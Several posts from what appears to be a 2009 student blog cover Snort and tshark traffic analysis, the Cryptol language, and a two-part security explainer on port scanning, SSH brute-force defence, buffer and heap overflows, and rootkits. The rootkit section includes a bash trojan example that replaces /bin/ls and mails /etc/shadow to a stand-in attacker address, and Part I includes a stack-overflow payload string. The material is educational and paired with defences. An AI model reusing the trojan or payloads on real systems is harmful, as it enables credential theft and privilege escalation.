## Capture and dissect network traffic

1 04 2009

Currently I am doing research at the University of Minho in the group of distributed systems, with duration of one year. My job is to find a way to identify specific links between a user and a distributed system. The general idea is to draw a map of services in a distributed system. This post only refers to the first milestone.

The proposal was to make such a system using Snort.

## Snort

Snort is a Network intrusion detection system, that means with Snort you can detect malicious activity in your network. We can detect many types of network attacks. We can identify DoS, DDoS attacks, port scans, cracking attempts, and much more.

Snort can operate in two different ways. We can set up Snort to run in passive mode, putting it to listen in promiscuous mode. That is, because Ethernet network switches send traffic to all computers connected to itself, we get traffic addressed to other machines on the network. To do this we only need to connect to the network and turn Snort on in our machine, no one knows that we are recording every traffic (including traffic destined for other computers).

Snort may also run in active mode. This “active” is not able to modify the data channel, but to be able to be installed in a network, a router for example and reap more information than in passive mode. Thus it makes sense to use the capacity of rules that Snort supports, to filter the traffic that it read.

To do this, Snort capture all packets that pass the network and interprets each. As the rules we have defined Snort tries to find these patterns in each packet, or each set of packets and take certain actions for each of them.

For example, if a large number of TCP requests reach a particular host, to a large number of ports in a short space of time we probably are the target of a port scan. NIDS like Snort know how to find these patterns and alerting the network administrator.

## Objective

Our aim was to use Snort to capture all traffic into passive mode.

root@pig:# snort -u snort -g snort -D -d -l /var/log/snort -c /etcsnort/snort.debian.conf -i eth0

We are saving the logs in binary (tcpdump format), for that I use the “-d -l /dir/” flags. I prefer to save all the packets into binary because is more easier to parse, than the structure of files and directories that Snort creates by default.

I started by trying to use some language that advised me to try to do the parsing of the file created by snort. Initially started to use python, but only find a tcpdump parser and could not get more than one file translated in tcpdump to hexadecimal.
After that I tried to use Haskell and I was amazed!

House is a Haskell Operative System done by The Programatica Project.

This is a system than can serve as a platform for exploring various ideas relating to low-level and system-level programming in a high-level functional language.

And indeed helped me a lot in doing my job. This project have already done a lot of parsers for network packets. It implements the Ethernet, IPv4, IPv6, TCP, UDP, ICMP, ARP and I think is all.

The libpcap (tcpdump parser) is already implemented in Haskell too, so is very simple to parse a complete packet:

getPacket :: [Word8] -> InPacket
getPacket bytes =  toInPack $listArray (0,Prelude.length bytes-1)$ bytes

-- Ethernet | IP | TCP | X
getPacketTCP :: [Word8] -> Maybe (NE.Packet (NI4.Packet (NT.Packet InPacket)))
getPacketTCP bytes = doParse $getPacket bytes :: Maybe (NE.Packet (NI4.Packet (NT.Packet InPacket)))  As you can see is too easy to have a compete structure of a packet parsed with this libraries. The problem is that they don’t have already implemented a application packet parser. So, according to that image: This is the level of depth we can go with this libraries. What is very good, but not perfect for me :S My supervisor told me to start searching a new tool to do this job. I was sad because I could not do everything in Haskell. But it is already promised that I will continue this project in Haskell. You can see the git repo here. I find tshark, a great tool to dissect and analyze data inside tcpdump files. ## The power of tshark tshark is the terminal based Wireshark, with it we can do everything we do with wireshark. Show all communications with the IP 192.168.74.242 root@pig:# tshark -R "ip.addr == 192.168.74.242" -r snort.log  ... 7750 6079.816123 193.136.19.96 -> 192.168.74.242 SSHv2 Client: Key Exchange Init 7751 6079.816151 192.168.74.242 -> 193.136.19.96 TCP ssh > 51919 [ACK] Seq=37 Ack=825 Win=7424 Len=0 TSV=131877388 TSER=1789588 7752 6079.816528 192.168.74.242 -> 193.136.19.96 SSHv2 Server: Key Exchange Init 7753 6079.817450 193.136.19.96 -> 192.168.74.242 TCP 51919 > ssh [ACK] Seq=825 Ack=741 Win=7264 Len=0 TSV=1789588 TSER=131877389 7754 6079.817649 193.136.19.96 -> 192.168.74.242 SSHv2 Client: Diffie-Hellman GEX Request 7755 6079.820784 192.168.74.242 -> 193.136.19.96 SSHv2 Server: Diffie-Hellman Key Exchange Reply 7756 6079.829495 193.136.19.96 -> 192.168.74.242 SSHv2 Client: Diffie-Hellman GEX Init 7757 6079.857490 192.168.74.242 -> 193.136.19.96 SSHv2 Server: Diffie-Hellman GEX Reply 7758 6079.884000 193.136.19.96 -> 192.168.74.242 SSHv2 Client: New Keys 7759 6079.922576 192.168.74.242 -> 193.136.19.96 TCP ssh > 51919 [ACK] Seq=1613 Ack=1009 Win=8960 Len=0 TSV=131877415 TSER=1789605 ...  Show with a triple: (time, code http, http content size), separated by ‘,’ and between quotation marks. root@pig:# tshark -r snort.log -R http.response -T fields -E header=y -E separator=',' -E quote=d -e frame.time_relative -e http.response.code -e http.content_length  ... "128.341166000","200","165504" "128.580181000","200","75332" "128.711618000","200","1202" "149.575548000","206","1" "149.719938000","304", "149.882290000","404","338" "150.026474000","404","341" "150.026686000","404","342" "150.170295000","304", "150.313576000","304", "150.456650000","304", ...  Show a tuple of arity 4 with: (time, source ip, destination ip, tcp packet size). root@pig:# tshark -r snort.log -R "tcp.len>0" -T fields -e frame.time_relative -e ip.src -e ip.dst -e tcp.len  ... 551.751252000 193.136.19.96 192.168.74.242 48 551.751377000 192.168.74.242 193.136.19.96 144 551.961545000 193.136.19.96 192.168.74.242 48 551.961715000 192.168.74.242 193.136.19.96 208 552.682260000 193.136.19.96 192.168.74.242 48 552.683955000 192.168.74.242 193.136.19.96 1448 552.683961000 192.168.74.242 193.136.19.96 1448 552.683967000 192.168.74.242 193.136.19.96 512 555.156301000 193.136.19.96 192.168.74.242 48 555.158474000 192.168.74.242 193.136.19.96 1448 555.158481000 192.168.74.242 193.136.19.96 1400 556.021205000 193.136.19.96 192.168.74.242 48 556.021405000 192.168.74.242 193.136.19.96 160 558.874202000 193.136.19.96 192.168.74.242 48 558.876027000 192.168.74.242 193.136.19.96 1448 ...  Show with a triple: (source ip, destination ip, port of destination ip). root@pig:# tshark -r snort.log -Tfields -e ip.src -e ip.dst -e tcp.dstport  ... 192.168.74.242 193.136.19.96 37602 192.168.74.242 193.136.19.96 37602 193.136.19.96 192.168.74.242 22 192.168.74.242 193.136.19.96 37602 193.136.19.96 192.168.74.242 22 193.136.19.96 192.168.74.242 22 192.168.74.242 193.136.19.96 37602 192.168.74.242 193.136.19.96 37602 192.168.74.242 193.136.19.96 37602 193.136.19.96 192.168.74.242 22 193.136.19.96 192.168.74.242 22 193.136.19.96 192.168.74.242 22 193.136.19.96 192.168.74.242 22 192.168.74.242 193.136.19.96 37602 192.168.74.242 193.136.19.96 37602 ...  ## Statistics Hierarchy of protocols root@pig:# tshark -r snort.log -q -z io,phs frame frames:7780 bytes:1111485 eth frames:7780 bytes:1111485 ip frames:3992 bytes:848025 tcp frames:3908 bytes:830990 ssh frames:2153 bytes:456686 http frames:55 bytes:19029 http frames:5 bytes:3559 http frames:3 bytes:2781 http frames:2 bytes:2234 http frames:2 bytes:2234 data-text-lines frames:10 bytes:5356 tcp.segments frames:3 bytes:1117 http frames:3 bytes:1117 media frames:3 bytes:1117 udp frames:84 bytes:17035 nbdgm frames:50 bytes:12525 smb frames:50 bytes:12525 mailslot frames:50 bytes:12525 browser frames:50 bytes:12525 dns frames:34 bytes:4510 llc frames:3142 bytes:224934 stp frames:3040 bytes:182400 cdp frames:102 bytes:42534 loop frames:608 bytes:36480 data frames:608 bytes:36480 arp frames:38 bytes:2046  ### Conversations We use: -z conv,TYPE,FILTER TYPE could be: • eth, • tr, • fc, • fddi, • ip, • ipx, • tcp, • udp And the filters are used to restrict the statistics. root@pig:# tshark -r snort.log -q -z conv,ip,tcp.port==80 ================================================================================ IPv4 Conversations Filter:tcp.port==80 | | | Total | |Frames Bytes | |Frames Bytes | |Frames Bytes | 193.136.19.148 192.168.74.242 141 13091 202 259651 343 272742 192.168.74.242 128.31.0.36 22 6858 28 4784 50 11642 ================================================================================  ### IO We use: -z io,stat,INT,FILTER,…,FILTER root@pig:# tshark -r snort.log -q -z io,stat,300,'not (tcp.port=22)' =================================================================== IO Statistics Interval: 300.000 secs Column #0: | Column #0 Time |frames| bytes 000.000-300.000 2161 543979 300.000-600.000 1671 264877 600.000-900.000 508 46224 900.000-1200.000 185 12885 1200.000-1500.000 201 14607 1500.000-1800.000 187 13386 1800.000-2100.000 189 13887 2100.000-2400.000 187 13386 2400.000-2700.000 189 13887 2700.000-3000.000 187 13386 3000.000-3300.000 185 12885 3300.000-3600.000 189 13887 3600.000-3900.000 210 15546 3900.000-4200.000 189 13887 4200.000-4500.000 187 13386 4500.000-4800.000 185 12885 4800.000-5100.000 189 13887 ===================================================================  ## Conclusion With tshark we could do everything we want to know what is inside a network packet. The trick is to understand the statistics that tshark generate, and know how to ask it. Now my work will get a machine to run Snort in an active mode and begin to understand how to use Snort to do all this work of collecting information. If you feel interested and understand Portuguese, see the presentation: ## Cryptol the language of cryptography 1 04 2009 Pedro Pereira and I are working on a new project in the Masters. The second half of the Masters is composed of a single project suggested by a company. Some companies are forming partnerships in the Masters formal methods, including: the Critical software, SIG and Galois. We chose the Galois because we also are in the area of cryptography and we already knew some work of some people from this company. The project suggested by Galois was study the Cryptol as a language of specification of cryptographic algorithms. The cipher we used for this study is the SNOW 3G (The SNOW website), later on I will talk about the specification of this cipher. In this post I am only interested to show the language. I’m going to show you some details about the language. This post is not intend to be a exhaustive explanation of Cryptol, if you looking for that you can go directly to the manuals. This post only relates my experience, and what I like it most with the language. ## Overview Cryptol is a high-level language that is geared to deal with low-level problems. Is a Domain-specific language to design and implement cryptographic algorithms. This language has a high percentage of correctness of the implementation of a cipher, because it implements type inference, so we can say that a big part of the language implements correctness. This correctness is also achieved thanks to the architecture of the language – functional. We don’t have side effects – a function only return something inside is codomain. In Cryptol we have this philosophy that says that everything is a sequence. This is very useful because we are working with low level data (array of bits), so we use sequences to represent that arrays. We can have nested sequences to have a more structured representation of data. For example, we can simply transform a 32-bit sequence in a 4 1-byte sequence. The size of this sequences could be implemented as finite or infinite, as we going to see later in this post. Because Cryptol is a high-level language we can also implement polymorphic functions, most of the primitive functions are implemented in polymorphic mode. The way we have to navigate throw the sequences is using recursion, or sequences comprehension, and with these two techniques we can implement recurrences. If you are a Haskell programmer you just need the next section to learn Cryptol. This language is so look a like with Haskell that even the philosophy seems to have a lot in commune. ## Types in Cryptol The type $[32]$ means that you have a sequence of 32-bit size. All the types in Cryptol are size oriented. The unit is the $Bit$, that you can use to represent $Bool$. To represent a infinite sequence we use the reserved word $inf$, and we write: $[inf]$ to represent that. If you want to generate a infinite sequence, we use the syntactic sugar of the sequences like that: $[1~..]$. Cryptol will infer this sequence as type $[1~..]~:~[inf][1]$ That means this sequence have infinite positions of 1-bit words. The type inference mechanism will always optimize the size that he needs, to represent the information. So, it infer the type of $[100~..]$ as: $[100~..]~:~[inf][7]$ Because, it “knows” that needs only 7-bits to represent the decimal $100$. But if you need more, you can force the type of your function. We implement polymorphism in our types, if we have: $f~:~[a]b~\rightarrow~[a]b$ This means, that the function $f$ have polymorphism over $b$, because we say that it domain is one sequence of size $a$ of type $b$, and it codomain also. Here we could also see: $f~:~[a][b]c$ meaning that $f$ is a constant of sequences of size $b$ of type $c$, $a$ times. So, lets talk about some primitive functions in Cryptol, and its types. The $tail$ function have the following type in Cryptol: $tail~:~\{a~b\}~[a+1]b~\rightarrow~[a]b$ As we can see, Cryptol is so size oriented, that we can use arithmetic operators in types. We can probably infer what this function does just from it type: $tail$ works for all $a$ and $b$ such that if we have one sequence os size $a+1$ of type $b$ it returns one sequence of size $a$ of same type. In fact this function removes the first element of one sequence. Because of this size oriented philosophy a lot of functions, that change the size of the sequences can be read just from the type. As you can see in the following list of Cryptol primitive function: $drop~:~\{ a~b~c \}~( fin~a ,~a~\geq~0)~\Rightarrow~(a ,[ a + b ]~c )~\rightarrow~[ b ]~c$ $take~:~\{ a~b~c \}~( fin~a ,~b~\geq~0)~\Rightarrow~(a ,[ a + b ]~c )~\rightarrow~[ a ]~c$ $join~:~\{ a~b~c \}~[ a ][ b ] c~\rightarrow~[ a * b ]~c$ $split~:~\{ a~b~c \}~[ a * b ] c~\rightarrow~[ a ][ b ]~c$ $tail~:~\{ a~b \}~[ a +1] b~\rightarrow~[ a ]~b$ ## Recursion and Recurrence Cryptol implements Recursion, just like a lot of functional languages do. Imagine the fibonacci function definition: It implementation in Crytol is exactly the same as defined mathematically. fib : [inf]32 -> [inf]32; fib n = if n == 0 then 0 else if n == 1 then 1 else fib (n-1) + fib (n-2); Cryptol uses recursion to permit us to iterate throw sequences. But, If you prefer you can implement a more functional algorithm of fibonacci function in Cryptol: fib : [inf]32 -> [inf]32; fib n = fibs @ n; where { fibs : [inf]32; fibs = [0 1] # [| x + y || x <- drop (1,fibs) || y <- fibs |]; }; Here, as you can see, we define a infinite list $fibs$ of all the fibonacci numbers, by calling the $fibs$ inside the sequences comprehension $fibs$, this is called a recurrence, and you can use that too in Cryptol. ## Cryptol vs C I’m going to show you some part of the implementation of SNOW 3G in C. This is a function called $MUL_{\alpha}$ MULa : [8] -> [32]; MULa(c) = join ( reverse [ ( MULxPOW(c, 23 :[32], 0xA9) ) ( MULxPOW(c, 245:[32], 0xA9) ) ( MULxPOW(c, 48 :[32], 0xA9) ) ( MULxPOW(c, 239:[32], 0xA9) ) ] );  /* The function MUL alpha. Input c: 8-bit input. Output : 32-bit output. See section 3.4.2 for details. \*/ u32 MULalpha(u8 c) { return ((((u32)MULxPOW(c,23, 0xa9)) << 24 ) | (((u32)MULxPOW(c, 245,0xa9)) << 16 ) | (((u32)MULxPOW(c, 48,0xa9)) << 8 ) | (((u32)MULxPOW(c, 239,0xa9)))) ; }  You can see that in Cryptol we just say that we want to work with a 32-bit word, and we don’t need to do any shift to our parts of the word. We just join them together. We reverse the sequence, because Cryptol stores words in little-endian, and we want to keep the definition like the specification. This is a very simple function, so the result in C is not so that different. But if we have a more complex function, we were going to start having a nightmare to write that in C. ## Conclusion Well, the conclusion is that Cryptol is a language that really help to write low-level algorithms. With Cryptol the specification is formal and easier to read than other languages. A value of Cryptol is that the code can be converted to other languages, such as VHDL and C. If you’re interested, take a look at the presentation that we did. ## References ## Tracing the attack – Part II 22 01 2009 ## Intro This post is the continuation of Tracing the attack – Part I. And this post is the final one, of this stack. Here I’m gonna to talk about the Heap/BSS Overflow and Rootkits. ## Heap In the Stack, the memory is allocated by kernel (as explained in Part I). In the other hand the Heap is a structure where the program can dynamically allocate memory. With the use of malloc(), realloc() and calloc() functions. ## BSS segment BSS stands for Block Started by Symbol and is used by compilers to store static variables. This variables are filled with zer-valued data at the start of the program. In C programing language all the not initialized and declared as static variables are placed in the BSS segment. ## Heap/BSS Overflow As a simple example, extracted from w00w00 article, to demonstrate a heap overflow:  /* demonstrates dynamic overflow in heap (initialized data) */ #define BUFSIZE 16 #define OVERSIZE 8 /* overflow buf2 by OVERSIZE bytes */ int main() { u_long diff; char *buf1 = (char *)malloc(BUFSIZE), *buf2 = (char *)malloc(BUFSIZE); diff = (u_long)buf2 - (u_long)buf1; printf("buf1 = %p, buf2 = %p, diff = 0x%x bytesn", buf1, buf2, diff); memset(buf2, 'A', BUFSIZE-1), buf2[BUFSIZE-1] = ''; printf("before overflow: buf2 = %sn", buf2); memset(buf1, 'B', (u_int)(diff + OVERSIZE)); printf("after overflow: buf2 = %sn", buf2); return 0; }  Now, when we execute this code with parameter 8:  [root /w00w00/heap/examples/basic]# ./heap1 8 buf1 = 0x804e000, buf2 = 0x804eff0, diff = 0xff0 bytes before overflow: buf2 = AAAAAAAAAAAAAAA after overflow: buf2 = BBBBBBBBAAAAAAA  This works like that, because buf1 overruns its boundary and write data in buf2 heap space. This program don’t crash because buf2 heap space still a valid segment. To see a BSS overflow we just have to replace the: ‘char *buf = malloc(BUFSIZE)’, by: ‘static char buf[BUFSIZE]’ If the heap is non-executable that will prevent the use of function calls there. But even so, that won’t prevent heap overflows. I won’t talk anymore about that subject in this post, if you want to learn more about that you can see the w00w00 article, and some-more from the references section (at the end of this post). ## Rootkits After gaining access the target machine (using an exploit for example), the attacker must ensure will continue to have access even after the victim has fixed the vulnerability, and without it knows that the system remains compromised. And the attacker can achieve this through the installation of a rootkit on the target machine. A rootkit is basically a set of tools (backdoors and trojan horses) designed with the aim to provide absolute control of the target machine. A backdoor is a way to authenticate a legitimate machine, providing remote access the same while trying to remain undetected. For example, you can take the form of a program or a change in a program already installed. A trojan horse (or just textittrojan) is usually a program that supposedly plays a role but which actually also plays other malicious functions without the knowledge of the victim. Then we show a very simple example of a bash script that creates a possible trojaned ls: #!/ bin/bash mv /bin/ls /bin/ls.old /bin/echo "cat /etc/shadow | mail attacker@domain.com" > /bin/ls /bin/echo "/ bin/ls.old" >> /bin/ls chmod +x /bin/ls  It is clear that we are not considering the fact that the ls can receive arguments, this is just for example purposes. And is good to show an example of the objective of a trojan. Usually the use of a real trojan would install a modified versions of several binary (lsof, ps, etc). The idea of changing this programs is to hide the trojan itself. With a ps changed command, the user could not see the trojan process running. Here is a list of the changed programs when you install Linux Rootkit 4: bindshell port/shell type daemon! chfn Trojaned! User > r00t chsh Trojaned! User > r00t crontab Trojaned! Hidden Crontab Entries du Trojaned! Hide files find Trojaned! Hide files fix File fixer! ifconfig Trojaned! Hide sniffing inetd Trojaned! Remote access killall Trojaned! Wont kill hidden processes linsniffer Packet sniffer! login Trojaned! Remote access ls Trojaned! Hide files netstat Trojaned! Hide connections passwd Trojaned! User > r00t pidof Trojaned! Hide processes ps Trojaned! Hide processes rshd Trojaned! Remote access sniffchk Program to check if sniffer is up and running syslogd Trojaned! Hide logs tcpd Trojaned! Hide connections, avoid denies top Trojaned! Hide processes wted wtmp/utmp editor! z2 Zap2 utmp/wtmp/lastlog eraser!  There are many rootkits over the network, the most common, compromise Windows and Unix systems. ## Detecting and removing rootkits When someone suspect that his system have been compromised, the best thing wold be use some tool to detect and remove rootkits. We have, for Linux: chkrootkit and rkhunter and for Windows you can use the RootkitRevealer. As curious, I would like to mention that in 2005, Sony BMG put a rootkit in several CDs of music that is self-installed (without notice) on computers where the CDs were read, for more about this. ## Outroduction As we saw, an attacker start of using a scanner against a particular range of ip’s, would then see if there are services available, then do a dictionary attack using the country’s victim language, extracted from the IP. Or could also detect vulnerabilities in the system, that he could use to gain access. After having access to the computer the attacker terminate by installing a rootkit to gain permanent access to this system. As a bonus I also explain some minimalistic examples of how can someone, that have physical access to a system, can gain root access to it exploiting some programs that are running in that system. This area is so vast that is still impossible to predict the ways to do an attack. Imagine that an attacker gain access to a computer, but they don’t have root credentials. Attackers probably will try to exploit some programs that are running in that systems… ## References ## Tracing the attack – Part I 21 01 2009 ## Intro In this post I will talk about some of the techniques used to attack systems, and some solutions that can reduce much the number of attacks that a system may suffer. A vision to the attack from scanning to gain root in one system. This work is a continuation of my work on honeypots. The attacks presented here could be seen in a honeypot of high activity, real systems that have known vulnerabilities. Unfortunately I used one low activity honeypot in previous posts, emulation of vulnerabilities, so I just could not get to identify some of the attacks mentioned herein. This post continues in Part II. ## Starting First let me talk about the profile of the principal threat that we face from the moment we use the Internet, the Script Kiddie. To a Script Kiddie not interest who is he attacking, its only purpose is to gain root access in a machine. The problem is that for helping him he has several tools that automate all the process, the only thing that usually has to do is put the tool to scan the entire Internet. Sooner or later it is guaranteed that he will get access in some machine. The fact that these tools are becoming more known ally to randomness searches, this threat is extremely dangerous because it is not “if” but “when” we will be victims of a search. I introduced the “who”, now let me introduce the “how”. Before starting any type of attack, the enemy must find that machines are online and their ports (services) that are open to the outside. This technique is called Port Scanning ## Port Scanning Port Scanning is used both by system administrators and by attackers, the first thing to determine the level of security of their machines; seconds to find the vulnerabilities as I said before. I will give special focus to this technique because it domain is essential in both situations. Basically a Port Scan is send a message to each port of a machine and depending on what kind of response we get determine the status of the port. These possible state ports are: • Open or Accepted: The machine has sent a response to indicate that a service that is listening port • Closed, Denied or Not Listening: The machine has sent a response to indicate that any connection the port will be denied • Filtered, Dropped or Blocked: There was no response from the machine Just a note on the legality of this technique: in fact Port Scanning can be seen as a bell to ring to confirm if someone is home. Nobody can be accused of nothing just for doing a Port Scan. Now if we are playing constantly on the bell, could be alleged the similarity to a denial of service (for more about legal issues related to Port Scanning). Now we are ready to see the most popular techniques in Port Scanning. ## TCP SYN scan The SYN scan is the most popular because it can be done in a very quick way, searching thousands of ports per second on a network (fast network and without firewalls). This kind of scan is relatively discreet because they never complete TCP connections. It also allows a distinct differentiation between the states of ports with a good confidence. This technique is also known as semi-open scan because it never gets to open a complete TCP connection. It is sent a SYN packet (the beginning of a normal complete connection) and expects a answer. If it receives a SYN/ACK, the port is Open, if it receives a RST, the port is Closed, and if there is no response after several retransmissions of the SYN, the port is marked as Filtered. This last scenario repeats itself in the event of an ICMP Unreachable Error. Normal scenario (client send a SYN, server reply with SYN/ACK, and client send an ACK): TCP SYN attack (client send a SYN, server reply with SYN/ACK, and client do nothing): This technique is used when the user does not have privileges to create crude packets (in nmap for example, you must have root privileges to this option.) Rather than be sent in “custom” packets as in all other techniques mentioned here, it established a complete TCP connection in the target machine port. This causes a considerable increase of time for giving same information as the previous technique (most packets are produced). In addition, most operative systems log these connections, because it is not a quick or silent scan. On Unix, for example, is added an entry in syslog. ## UDP scan A UDP scanis much slower than a TCP one, one of the reasons why many systems administrators ignore the security of these ports, but not the attackers. This technique consists in sending an empty UDP header (no data) to all target ports. If an ICMP Unreachable Error is returned, depending on type and code of error is given the port state (Closed or Filtered). However if returned another UDP header, then the port is Open, if not received any response after the retransmissions of the header, the port is classified as a combination of Open or Filtered because may be in a state or in the other. But as I said the greatest disadvantage of this technique is the time spent on scan; Open or Filtered ports rarely respond which can lead to several retransmissions (because it is assumed that the packet could have been lost). Closed ports are an even bigger problem because normally respond with ICMP Unreachable Errors and many operative systems limit the frequency of ICMP packets transmission, as a example in Linux that normally limited to a maximum of one package per second. Faced with such constraints, if we were to the full range of ports of a machine (65536 ports) it will take more than 18 hours. Some optimizations can pass through the more common ports. There are many others techniques used in Port Scanning (more information: here) but this ones come to show the behavior of this type of scan. It is easy to see why it is a critical process for an attacker methodology. For the correct identification of the target, only one technique can not be the most appropriate/enough. So the Port Scanning area is not only making TCP SYN scans. The tool I recommend to Port Scanning is the Nmap because it supports all these techniques that I said, and a lot more. This tool is being actively developed, and the author Gordon “Fyodor” Lyon is a guru in this area and highly responsible for the constant development of it. For more information about Port scanning go to Nmap page explaining Port Scanning Techniques. ## Gain access to the machine At this time the attacker already has a huge list of reachable machines and services. Now to get remote access on a machine, in essence, we can use two techniques: brute-force/password dictionaries (see the Infinite monkey theorem). It may seem silly but it is still heavily used in services such as SSH. As you can see in your /var/log/auth.log file… Dec 24 01:24:46 kubos sshd[23906]: Invalid user oracle from 89.235.152.18 Dec 24 01:24:46 kubos sshd[23906]: pam_unix(ssh:auth): check pass; user unknown Dec 24 01:24:46 kubos sshd[23906]: pam_unix(ssh:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.235.152.18 Dec 24 01:24:48 kubos sshd[23906]: Failed password for invalid user oracle from 89.235.152.18 port 48785 ssh2 Dec 24 01:24:49 kubos sshd[23908]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT! Dec 24 01:26:01 kubos sshd[23963]: Invalid user test from 89.235.152.18 Dec 24 01:26:01 kubos sshd[23963]: pam_unix(ssh:auth): check pass; user unknown Dec 24 01:26:01 kubos sshd[23963]: pam_unix(ssh:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.235.152.18 Dec 24 01:26:04 kubos sshd[23963]: Failed password for invalid user test from 89.235.152.18 port 57886 ssh2 Dec 24 01:26:05 kubos sshd[23965]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT! Dec 24 01:26:21 kubos sshd[23975]: Invalid user cvsuser from 89.235.152.18 Dec 24 01:26:21 kubos sshd[23975]: pam_unix(ssh:auth): check pass; user unknown Dec 24 01:26:21 kubos sshd[23975]: pam_unix(ssh:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.235.152.18 Dec 24 01:26:22 kubos sshd[23975]: Failed password for invalid user cvsuser from 89.235.152.18 port 59883 ssh2 Dec 24 01:26:24 kubos sshd[23977]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT! And these are just some of the hundreds of attempts that it recorded. I will then present some strategies for protection against these attacks: ### Use strong passwords This section may seem ridiculous but the fact that this type of attack is used demonstrates the lack of choice of passwords culture. Here are some requirements to define a strong password in today times: • A password should have, a minimum of 8 characters • If the password can be found in a dictionary is trivial and is not good. Attackers have large dictionaries of words in different languages (via IP, for example, can determine the dictionary to use) • As trivial variations of trivial passwords, such as “p4ssword” is almost as bad as “password” in a dictionary attack but is substantially better in an brute-force attack • The password should ideally be a combination of symbols, numbers, uppercase and lowercase • Mnemonic are easy to remember (even with special symbols) and this is the best kind of passwords, such as “Whiskey-Cola is EUR 3 in Academic Bar!” = “W-CiE3iAB!” (this password is Very String according to The Password Meter) The fact is, using strong passwords can prevent the success of the attempt but not prevent the numerous attempts that are made consistently. And in an extreme situation might be suffering Denial of Service attacks (it is imperative to avoid this on a machine whose purpose is to offer the service to the outside). Not mentioned the fact that we can limit the number of connections established in the port 22 (SSH) through iptables. ### Using iptables to mitigating the attacks We can limiting the access to a single source: iptables -A INPUT -m state --state NEW -m tcp -p tcp -s 192.168.1.100 --dport 22 -j ACCEPT The -s flag is used to indicate the source host ip. We can also restrict the access to some sub-net, or some IP class address with this flag: iptables -A INPUT -m state --state NEW -m tcp -p tcp -s 192.168.1.0/24 -dport 22 -j ACCEPT If we want access our machine from everyware we might want to limit our server to accept, for example, 2 connections per minute: iptables -N SSH_CONNECTION -A INPUT -m state --state NEW -p tcp --dport 22 -j SSH_CONNECTION -A SSH_CONNECTION -m recent --set --name SSH -A SSH_CONNECTION -m recent --update --seconds 60 --hitcount 3 --name SSH -j DROP We can create a new chain called SSH_CONNECTION. The chain uses the recent module to allow at maximum two connection attempts per minute per IP. ## RSA authentication To avoid the use of passwords, we can use a pair of RSA keys completely avoiding brute-force/dictionaries attacks. To do this we will do the following steps: Generate the key pair with the command ssh-keygen-t rsa This command create the files: ~/.ssh/id_rsa (private key) and ~/.ssh/id_rsa.pub (public key). In each machine where we want to connect (target), put the “id_rsa.pub” generated in ~/.ssh/authorized_keys concatenate the contents of this form for example: cat id_rsa.pub >> ~/.ssh/authorized_keys In each machine where we want to call (home), put the “id_rsa” in ~/.ssh/ Only missing off the password-based login to add the line “PasswordAuthentication no” in /etc/ssh/sshd_config and then restart the daemon “sshd” through: /etc/init.d/sshd restart ## Exploitation of vulnerabilities Now that we reduce the chances of being attacked, let’s see another way that attackers use to gain access into a system. Exploit is the name given to a piece of code used to exploit flaws in applications in order to cause a behavior not previously anticipated in them. Thus is common, for example, gaining control of a machine or spread privileges. A widely used type of exploit is stack smashing which occurs when a program writes a memory address outside their allocated space for the structure of data in the stack, usually a buffer of fixed size. Take a very simple example of local implementation of this exploit: # include # include int main(int argc , char *argv []) { char buffer [10]; strcpy (buffer ,argv [1]); printf ( buffer ); return 0; } When we try to execute the above code, we get: user@honeypot :~$ gcc exploit .c -o exploit
user@honeypot :~\$ ./ exploit thisisanexploit
*** stack smashing detected ***: ./ exploit terminated
thisisanexploitAborted

As we can see, GCC has introduced mechanisms for blocking implementation of code potentially malicious. But this example is as simple as possible. More sophisticated attacks against systems can avoid this mechanisms.

### The stack

When a function is called, the return value must be addressed, and it address must be somewhere saved in the stack. Saving the return address into the stack is one advantage, each task has its own stack, so each must have its return address. Another thing, is that recursion is completely supported. In case that a function call itself, a return address must be created for each recursive phase, in each stack function call.
For example, the following code:

/** lengthOf  returns the length of list  l  */
public int lengthOf(Cell l) {
int length;

if ( l == null ) {
length = 0;
}
else {
length = 1 + lengthOf(l.getNext());
}
return length;
}

Will produce the following stacks:

The stack also contain local data storage. If any function declare local variables, they are stored there also. And may also contain parameters passed to the function, for more information about that.

### GCC and Stack canary’s

If you wondering why a canary.
GCC, and other compilers insert in the stack known values to monitor buffer overflows. In the case that the stack buffer overflows, the first field to be corrupted will be the canary. Forward, the sub-routines inserted into the program by GCC verify the canary field and verify that this as changed, sending a message “*** stack smashing detected ***”.

### Stack corruption

If you still thinking what stack buffer overflow is god for? I give you a simple example (from Wikipedia article).
Imagine you have the following code:

void foo (char *bar)
{
char  c[12];

memcpy(c, bar, strlen(bar));  // no bounds checking...
}

int main (int argc, char **argv)
{
foo(argv[1]);
}

As you can see, there are no verification about the input of the function foo, about the *bar variable.
This is the stack that are created at some point when this function is called by another one:

When you call the foo, like:

void function() {
char *newBar = (char *)malloc(sizeof(char)*6);
strcpy(newBar,"hello");
foo(newBar);
}


This is what happens to the stack:

Now, if you try this:

void function() {
char *newBar = (char *)malloc(sizeof(char)*24);
strcpy(newBar,"A​A​A​A​A​A​A​A​A​A​A​A​A​A​A​A​A​A​A​A​x08​x35​xC0​x80");
foo(newBar);
}


This is what happens to the stack:

So, now, when the foo function terminates, it will pop the return address and jump to that address (0x08C03508, in this case), and not to the expected one. In this iamge, the address 0x08C03508 is the beginning of the char c[12] code. Where the attacker can previously put shellcode, and not AAAAA string…
Now imagine that this program is SUID bit on to run as root, you can instantly scale to root…

Fortunately this kind of attacks is being to reduce, since the introduction of stack canary’s. This kind of protection is possible because the stack is not dynamic, but as we gone see later (in part II), the heap is.